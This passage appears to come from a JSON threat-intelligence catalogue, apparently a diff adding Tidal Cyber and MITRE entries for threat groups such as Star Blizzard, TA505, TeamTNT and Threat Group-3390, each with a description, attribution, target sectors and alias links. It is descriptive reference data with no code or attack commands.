[SilverTerrier](https://app.tidalcyber.com/groups/e47ae2a7-d34d-4528-ba67-c9c07daa91ba) mainly targets organizations in high technology, higher education, and manufacturing.[[Unit42 SilverTerrier 2018](https://app.tidalcyber.com/references/59630d6e-d034-4788-b418-a72bafefe54e)][[Unit42 SilverTerrier 2016](https://app.tidalcyber.com/references/a6ba79ca-7d4a-48d3-aae3-ee766770f83b)]", + "meta": { + "country": "NG", + "group_attack_id": "G0083", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Education", + "Manufacturing", + "Technology", + "Telecommunications", + "Transportation" + ] + }, + "related": [], + "uuid": "e47ae2a7-d34d-4528-ba67-c9c07daa91ba", + "value": "SilverTerrier" + }, + { + "description": "[Sowbug](https://app.tidalcyber.com/groups/6632f07f-7c6b-4d12-8544-82edc6a7a577) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. [[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)]", + "meta": { + "group_attack_id": "G0054", + "observed_countries": [ + "AR", + "BR", + "BN", + "EC", + "MY", + "PE" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government" + ] + }, + "related": [ + { + "dest-uuid": "1ca3b039-404e-4132-88c2-4e41235cd2f5", + "type": "similar" + } + ], + "uuid": "6632f07f-7c6b-4d12-8544-82edc6a7a577", + "value": "Sowbug" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nStar Blizzard is believed to be a Russia-based cyber threat actor group. According to joint Cybersecurity Advisory AA23-341A (December 2023), U.S. and international authorities assess that Star Blizzard is “almost certainly” a subordinate of the Russian Federal Security Service (FSB) Centre 18. Star Blizzard is known to successfully use spear-phishing attacks against its targets for information-gathering purposes. The advisory indicated that authorities observed these spear-phishing attacks occurring through 2023. Star Blizzard has traditionally targeted academic, defense, government, non-governmental (NGO), and think tank organizations (and associated personnel) in the United States and United Kingdom, other NATO nations, and countries neighboring Russia. Politicians have also been targeted. According to the advisory, beginning in 2022, authorities witnessed Star Blizzard targeting expand to targets in the defense-industrial sector and U.S. Department of Energy facilities.[[U.S. CISA Star Blizzard December 2023](/references/3d53c154-8ced-4dbe-ab4e-db3bc15bfe4b)]", + "meta": { + "country": "RU", + "group_attack_id": "G5017", + "observed_countries": [ + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [], + "target_categories": [ + "Defense", + "Education", + "Energy", + "Government", + "NGOs" + ] + }, + "related": [], + "uuid": "a13bd574-b907-4489-96ab-8d30faf7fca4", + "value": "Star Blizzard" + }, + { + "description": "[Stealth Falcon](https://app.tidalcyber.com/groups/ca3016f3-642a-4ae0-86bc-7258475d6937) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. [[Citizen Lab Stealth Falcon May 2016](https://app.tidalcyber.com/references/11f46b1e-a141-4d25-bff0-e955251be7f5)]", + "meta": { + "group_attack_id": "G0038", + "observed_countries": [ + "AE" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Entertainment", + "Human Rights" + ] + }, + "related": [ + { + "dest-uuid": "dab75e38-6969-4e78-9304-dc269c3cbcf0", + "type": "similar" + } + ], + "uuid": "ca3016f3-642a-4ae0-86bc-7258475d6937", + "value": "Stealth Falcon" + }, + { + "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. [[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)] [[Kaspersky ProjectSauron Full Report](https://app.tidalcyber.com/references/6840c1d6-89dc-4138-99e8-fbd2a45f2a1c)]", + "meta": { + "id": "081ed982-e5c6-46c4-b84b-c30e6c3f76b0" + }, + "related": [ + { + "dest-uuid": "deb573c6-071a-4b50-9e92-4aa648d8bdc1", + "type": "similar" + } + ], + "uuid": "bb2eac9b-3dfc-487a-8dff-b8de5f6e3041", + "value": "ProjectSauron" + }, + { + "description": "[Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.[[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)][[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]", + "meta": { + "group_attack_id": "G0041", + "observed_countries": [ + "BE", + "CN", + "IR", + "RU", + "RW", + "SE" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Defense", + "Financial Services", + "Government", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "f3179cfb-9c86-4980-bd6b-e4fa74adaaa7", + "type": "similar" + }, + { + "dest-uuid": "bb2eac9b-3dfc-487a-8dff-b8de5f6e3041", + "type": "similar" + } + ], + "uuid": "deb573c6-071a-4b50-9e92-4aa648d8bdc1", + "value": "Strider" + }, + { + "description": "[Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c) is a China-based threat group that has been active since at least 2014. [[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]", + "meta": { + "country": "CN", + "group_attack_id": "G0039", + "observed_countries": [ + "IN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "5abb12e7-5066-4f84-a109-49a037205c76", + "type": "similar" + } + ], + "uuid": "06549082-ff70-43bf-985e-88c695c7113c", + "value": "Suckfly" + }, + { + "description": "[TA2541](https://app.tidalcyber.com/groups/1bfbb1e1-022c-57e9-b70e-711c601640be) is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. [TA2541](https://app.tidalcyber.com/groups/1bfbb1e1-022c-57e9-b70e-711c601640be) campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.[[Proofpoint TA2541 February 2022](https://app.tidalcyber.com/references/db0b1425-8bd7-51b5-bae3-53c5ccccb8da)][[Cisco Operation Layover September 2021](https://app.tidalcyber.com/references/f19b4bd5-99f9-54c0-bffe-cc9c052aea12)]", + "meta": { + "group_attack_id": "G1018", + "observed_countries": [ + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Defense", + "Manufacturing", + "Transportation" + ] + }, + "related": [], + "uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "value": "TA2541" + }, + { + "description": "[TA459](https://app.tidalcyber.com/groups/e343c1f1-458c-467b-bc4a-c1b97b2127e3) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. [[Proofpoint TA459 April 2017](https://app.tidalcyber.com/references/dabad6df-1e31-4c16-9217-e079f2493b02)]", + "meta": { + "country": "CN", + "group_attack_id": "G0062", + "observed_countries": [ + "BY", + "MN", + "RU" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "c6472ae1-c6ad-4cf1-8d6e-8c94b94fe314", + "type": "similar" + } + ], + "uuid": "e343c1f1-458c-467b-bc4a-c1b97b2127e3", + "value": "TA459" + }, + { + "description": "[[IBM TA505 April 2020](https://app.tidalcyber.com/references/bcef8bf8-5fc2-4921-b920-74ef893b8a27)]", + "meta": { + "id": "1b8be083-5a61-4258-9930-c9af51134220" + }, + "related": [ + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "similar" + } + ], + "uuid": "4f21a323-28d3-498d-8cfe-a1835eebd561", + "value": "Hive0065" + }, + { + "description": "[TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is a cyber criminal group that has been active since at least 2014. [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a).[[Proofpoint TA505 Sep 2017](https://app.tidalcyber.com/references/c1fff36f-802b-4436-abce-7f2787c148db)][[Proofpoint TA505 June 2018](https://app.tidalcyber.com/references/e48dec7b-5635-4ae0-b0db-229660806c06)][[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)][[NCC Group TA505](https://app.tidalcyber.com/references/45e0b869-5447-491b-9e8b-fbf63c62f5d6)][[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)]", + "meta": { + "group_attack_id": "G0092", + "observed_countries": [ + "AU", + "CA", + "DE", + "GB", + "US" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172", + "a98d7a43-f227-478e-81de-e7299639a355" + ], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "03c80674-35f8-4fe0-be2b-226ed0fcd69f", + "type": "similar" + }, + { + "dest-uuid": "4f21a323-28d3-498d-8cfe-a1835eebd561", + "type": "similar" + } + ], + "uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "value": "TA505" + }, + { + "description": "[[Unit 42 Valak July 2020](https://app.tidalcyber.com/references/9a96da13-5795-49bc-ab82-dfd4f964d9d0)][[Unit 42 TA551 Jan 2021](https://app.tidalcyber.com/references/8e34bf1e-86ce-4d52-a6fa-037572766e99)]", + "meta": { + "id": "9e152191-3791-4025-bacc-2ce10f849daa" + }, + "related": [ + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "similar" + } + ], + "uuid": "2d829442-7a16-46ab-9d4d-b92cd1f0be7e", + "value": "Shathak" + }, + { + "description": "[[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)]", + "meta": { + "id": "26c30ee4-7bf4-432e-ab46-b0ae9c8eaa51" + }, + "related": [ + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "similar" + } + ], + "uuid": "f9c58990-a69d-4edc-ad9d-ec74412da18a", + "value": "GOLD CABIN" + }, + { + "description": "[TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) is a financially-motivated threat group that has been active since at least 2018. [[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)] The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. [[Unit 42 TA551 Jan 2021](https://app.tidalcyber.com/references/8e34bf1e-86ce-4d52-a6fa-037572766e99)]", + "meta": { + "group_attack_id": "G0127", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "36e8c848-4d20-47ea-9fc2-31aa17bf82d1", + "type": "similar" + }, + { + "dest-uuid": "2d829442-7a16-46ab-9d4d-b92cd1f0be7e", + "type": "similar" + }, + { + "dest-uuid": "f9c58990-a69d-4edc-ad9d-ec74412da18a", + "type": "similar" + } + ], + "uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "value": "TA551" + }, + { + "description": "*Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the **Add to Matrix** button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).*\n\nTA577 is a cybercriminal actor that has remained highly active since mid-2020. The actor is known for carrying out email-based campaigns that result in the delivery of a wide range of payloads, including at least one leading to ransomware (REvil) deployment. These campaigns are known to impact organizations in a wide range of sectors and geographic locations.[[Proofpoint Ransomware Initial Access June 2021](/references/3b0631ae-f589-4b7c-a00a-04dcd5f3a77b)] The actor appears adept at shifting payloads in response to external factors, for example moving to deliver DarkGate and Pikabot shortly after international authorities disrupted the QakBot botnet in August 2023.[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]", + "meta": { + "group_attack_id": "G5019", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "owner": "TidalCyberIan", + "source": "Tidal Cyber", + "tags": [], + "target_categories": [] + }, + "related": [], + "uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "value": "TA577" + }, + { + "description": "[TeamTNT](https://app.tidalcyber.com/groups/325c11be-e1ee-47db-afa6-44ac5d16f0e7) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.[[Palo Alto Black-T October 2020](https://app.tidalcyber.com/references/d4351c8e-026d-4660-9344-166481ecf64a)][[Lacework TeamTNT May 2021](https://app.tidalcyber.com/references/5908b04b-dbca-4fd8-bacc-141ef15546a1)][[Intezer TeamTNT September 2020](https://app.tidalcyber.com/references/1155a45e-86f4-497a-9a03-43b6dcb25202)][[Cado Security TeamTNT Worm August 2020](https://app.tidalcyber.com/references/8ccab4fe-155d-44b0-b0f2-941e9f8f87db)][[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)][[Trend Micro TeamTNT](https://app.tidalcyber.com/references/d6b52135-6bb2-4e37-8f94-1e1d6354bdfd)][[ATT TeamTNT Chimaera September 2020](https://app.tidalcyber.com/references/5d9f402f-4ff4-4993-8685-e5656e2f3aff)][[Aqua TeamTNT August 2020](https://app.tidalcyber.com/references/ca10ad0d-1a47-4006-8f76-c2246aee7752)][[Intezer TeamTNT Explosion September 2021](https://app.tidalcyber.com/references/e0d6208b-a4d6-45f0-bb3a-6c8681630b55)]", + "meta": { + "group_attack_id": "G0139", + "observed_countries": [], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "efa33611-88a5-40ba-9bc4-3d85c6c8819b", + "82009876-294a-4e06-8cfc-3236a429bda4", + "4fa6f8e1-b0d5-4169-8038-33e355c08bde", + "2e5f6e4a-4579-46f7-9997-6923180815dd" + ], + "target_categories": [] + }, + "related": [], + "uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", + "value": "TeamTNT" + }, + { + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://app.tidalcyber.com/software/).[[Dragos Xenotime 2018](https://app.tidalcyber.com/references/b20fe65f-df43-4a59-af3f-43afafba15ab)][[Pylos Xenotime 2019](https://app.tidalcyber.com/references/e2f246d8-c75e-4e0f-bba8-869d82be26da)][[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)][[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)]", + "meta": { + "id": "a6810875-326d-4627-8802-75eedd09ad8a" + }, + "related": [ + { + "dest-uuid": "3a54b8dc-a231-4db8-96da-1c0c1aa396f6", + "type": "similar" + } + ], + "uuid": "cbba6443-46cd-4602-87ff-1142995202ab", + "value": "XENOTIME" + }, + { + "description": "[TEMP.Veles](https://app.tidalcyber.com/groups/3a54b8dc-a231-4db8-96da-1c0c1aa396f6) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://app.tidalcyber.com/software/), a malware framework designed to manipulate industrial safety systems.[[FireEye TRITON 2019](https://app.tidalcyber.com/references/49c97b85-ca22-400a-9dc4-6290cc117f04)][[FireEye TEMP.Veles 2018](https://app.tidalcyber.com/references/e41151fa-ea11-43ca-9689-c65aae63a8d2)][[FireEye TEMP.Veles JSON April 2019](https://app.tidalcyber.com/references/491783dc-7a6b-42a6-b923-c4439117e7e4)]", + "meta": { + "country": "RU", + "group_attack_id": "G0088", + "observed_countries": [ + "SA", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Infrastructure" + ] + }, + "related": [ + { + "dest-uuid": "90abfc42-91c6-11e9-89b1-af58de8f7ec2", + "type": "similar" + }, + { + "dest-uuid": "cbba6443-46cd-4602-87ff-1142995202ab", + "type": "similar" + } + ], + "uuid": "3a54b8dc-a231-4db8-96da-1c0c1aa396f6", + "value": "TEMP.Veles" + }, + { + "description": "[The White Company](https://app.tidalcyber.com/groups/830079fe-9824-405b-93e0-c28592155c49) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.[[Cylance Shaheen Nov 2018](https://app.tidalcyber.com/references/57802e46-e12c-4230-8d1c-08854a0de06a)]", + "meta": { + "group_attack_id": "G0089", + "observed_countries": [ + "PK" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Government" + ] + }, + "related": [], + "uuid": "830079fe-9824-405b-93e0-c28592155c49", + "value": "The White Company" + }, + { + "description": "[[Dell TG-1314](https://app.tidalcyber.com/references/79fc7568-b6ff-460b-9200-56d7909ed157)]", + "meta": { + "id": "68535ecf-5a76-42b1-8a2e-e3366b01b95c" + }, + "related": [ + { + "dest-uuid": "0f86e871-0c6c-4227-ae28-3f3696d6ae9d", + "type": "similar" + } + ], + "uuid": "a3bf437b-2805-424a-8122-b1f07f68c3c2", + "value": "TG-1314" + }, + { + "description": "[Threat Group-1314](https://app.tidalcyber.com/groups/0f86e871-0c6c-4227-ae28-3f3696d6ae9d) is an unattributed threat group that has used compromised credentials to log into a victim's remote access infrastructure. [[Dell TG-1314](https://app.tidalcyber.com/references/79fc7568-b6ff-460b-9200-56d7909ed157)]", + "meta": { + "group_attack_id": "G0028", + "observed_countries": [], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "a3bf437b-2805-424a-8122-b1f07f68c3c2", + "type": "similar" + } + ], + "uuid": "0f86e871-0c6c-4227-ae28-3f3696d6ae9d", + "value": "Threat Group-1314" + }, + { + "description": "[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "161f4194-5138-47c2-9666-d55b5287dc21" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "acc5d023-b5f9-40c0-9061-8424c14334a4", + "value": "Earth Smilodon" + }, + { + "description": "[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)][[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)]", + "meta": { + "id": "2bdc8ad0-5eb2-4ec8-8a58-16234a044647" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "851cfd6f-8ca5-4048-b5a0-c23729456f12", + "value": "TG-3390" + }, + { + "description": "[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)][[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)]", + "meta": { + "id": "1c394f39-84e0-45b8-a34b-22cf69cf709d" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "621b8362-b819-40af-8534-80efd9af3fd1", + "value": "BRONZE UNION" + }, + { + "description": "[[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "af363795-4a49-4c3f-a693-aeb4092dcb87" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "0aec785f-db69-49f4-ad4f-68fe226a5399", + "value": "Iron Tiger" + }, + { + "description": "[[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "c07fdac7-3f1a-4321-9caf-2e117eefa720" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "869b23ab-c9a6-4fa3-abc8-2982707e68d7", + "value": "LuckyMouse" + }, + { + "description": "[[Gallagher 2015](https://app.tidalcyber.com/references/b1540c5c-0bbc-4b9d-9185-fae224ba31be)][[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Unit42 Emissary Panda May 2019](https://app.tidalcyber.com/references/3a3ec86c-88da-40ab-8e5f-a7d5102c026b)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "4dd1a6d5-8f50-47ba-9e1d-1ae3f341fe3b" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "6892414f-3428-4ff4-bb27-cefb2c7177e4", + "value": "Emissary Panda" + }, + { + "description": "[[Nccgroup Emissary Panda May 2018](https://app.tidalcyber.com/references/e279c308-fabc-47d3-bdeb-296266c80988)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Hacker News LuckyMouse June 2018](https://app.tidalcyber.com/references/de78446a-cb46-4422-820b-9ddf07557b1a)][[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]", + "meta": { + "id": "0f5e1d81-0631-4c8d-9021-7d60fd899ba8" + }, + "related": [ + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "similar" + } + ], + "uuid": "bc77908c-dcb0-4d07-933d-a1dded911306", + "value": "APT27" + }, + { + "description": "[Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) is a Chinese threat group that has extensively used strategic Web compromises to target victims.[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)] The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.[[SecureWorks BRONZE UNION June 2017](https://app.tidalcyber.com/references/42adda47-f5d6-4d34-9b3d-3748a782f886)][[Securelist LuckyMouse June 2018](https://app.tidalcyber.com/references/f974708b-598c-46a9-aac9-c5fbdd116c2a)][[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]", + "meta": { + "country": "CN", + "group_attack_id": "G0027", + "observed_countries": [ + "AU", + "CA", + "CN", + "DE", + "HK", + "IN", + "IR", + "IL", + "JP", + "KR", + "MN", + "PH", + "RU", + "ES", + "TW", + "TH", + "TR", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" + ], + "target_categories": [ + "Aerospace", + "Automotive", + "Banks", + "Casinos Gambling", + "Defense", + "Education", + "Energy", + "Government", + "Manufacturing", + "Pharmaceuticals", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "834e0acd-d92a-4e38-bb14-dc4159d7cb32", + "type": "similar" + }, + { + "dest-uuid": "acc5d023-b5f9-40c0-9061-8424c14334a4", + "type": "similar" + }, + { + "dest-uuid": "851cfd6f-8ca5-4048-b5a0-c23729456f12", + "type": "similar" + }, + { + "dest-uuid": "621b8362-b819-40af-8534-80efd9af3fd1", + "type": "similar" + }, + { + "dest-uuid": "0aec785f-db69-49f4-ad4f-68fe226a5399", + "type": "similar" + }, + { + "dest-uuid": "869b23ab-c9a6-4fa3-abc8-2982707e68d7", + "type": "similar" + }, + { + "dest-uuid": "6892414f-3428-4ff4-bb27-cefb2c7177e4", + "type": "similar" + }, + { + "dest-uuid": "bc77908c-dcb0-4d07-933d-a1dded911306", + "type": "similar" + } + ], + "uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "value": "Threat Group-3390" + }, + { + "description": "[Thrip](https://app.tidalcyber.com/groups/a3b39b07-0bfa-4c69-9f01-acf7dc6033b4) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as \"living off the land\" techniques. [[Symantec Thrip June 2018](https://app.tidalcyber.com/references/482a6946-b663-4789-a31f-83fb2132118d)]", + "meta": { + "group_attack_id": "G0076", + "observed_countries": [ + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Defense", + "Telecommunications" + ] + }, + "related": [ + { + "dest-uuid": "98be4300-a9ef-11e8-9a95-bb9221083cfc", + "type": "similar" + } + ], + "uuid": "a3b39b07-0bfa-4c69-9f01-acf7dc6033b4", + "value": "Thrip" + }, + { + "description": "[[Secureworks BRONZE HUNTLEY ](https://app.tidalcyber.com/references/9558ebc5-4de3-4b1d-b32c-a170adbc3451)]", + "meta": { + "id": "b81e735d-40ea-4fc8-a84a-7cf717346155" + }, + "related": [ + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "similar" + } + ], + "uuid": "aee5a88d-6695-4221-a4fb-1f7aa1bfdcd4", + "value": "BRONZE HUNTLEY" + }, + { + "description": "[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)][[CrowdStrike Manufacturing Threat July 2020](https://app.tidalcyber.com/references/5ed6a702-dcc5-4021-95cc-5b720dbd8774)]", + "meta": { + "id": "9ac5e0d4-9387-4111-9b05-15613722fdcc" + }, + "related": [ + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "similar" + } + ], + "uuid": "7e6588d8-8d1e-4ed0-a233-38f3b37c2aad", + "value": "Karma Panda" + }, + { + "description": "[[TrendMicro Tonto Team October 2020](https://app.tidalcyber.com/references/140e6b01-6b98-4f82-9455-0c84b3856b86)]", + "meta": { + "id": "910288bd-71dd-4635-b559-ccb2d7879ab6" + }, + "related": [ + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "similar" + } + ], + "uuid": "9f9382c1-edc9-434c-945a-71bfdf28ca6f", + "value": "Earth Akhlut" + }, + { + "description": "[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)]", + "meta": { + "id": "d748b970-fab9-4ae3-919b-2188e7f0ad95" + }, + "related": [ + { + "dest-uuid": "9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c", + "type": "similar" + } + ], + "uuid": "70c9c7d6-d51a-4c73-823f-fffd0d75f63e", + "value": "CactusPete" + }, + { + "description": "[Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).[[Kaspersky CactusPete Aug 2020](https://app.tidalcyber.com/references/1c393964-e717-45ad-8eb6-5df5555d3c70)][[ESET Exchange Mar 2021](https://app.tidalcyber.com/references/c83f1810-22bb-4def-ab2f-3f3d67703f47)][[FireEye Chinese Espionage October 2019](https://app.tidalcyber.com/references/d37c069c-7fb8-44e1-8377-da97e8bbcf67)][[ARS Technica China Hack SK April 2017](https://app.tidalcyber.com/references/c9c647b6-f4fb-44d6-9376-23c1ae9520b4)][[Trend Micro HeartBeat Campaign January 2013](https://app.tidalcyber.com/references/f42a36c2-1ca5-49ff-a7ec-7de90379a6d5)][[Talos Bisonal 10 Years March 2020](https://app.tidalcyber.com/references/6844e59b-d393-43df-9978-e3e3cc7b8db6)]", + "meta": 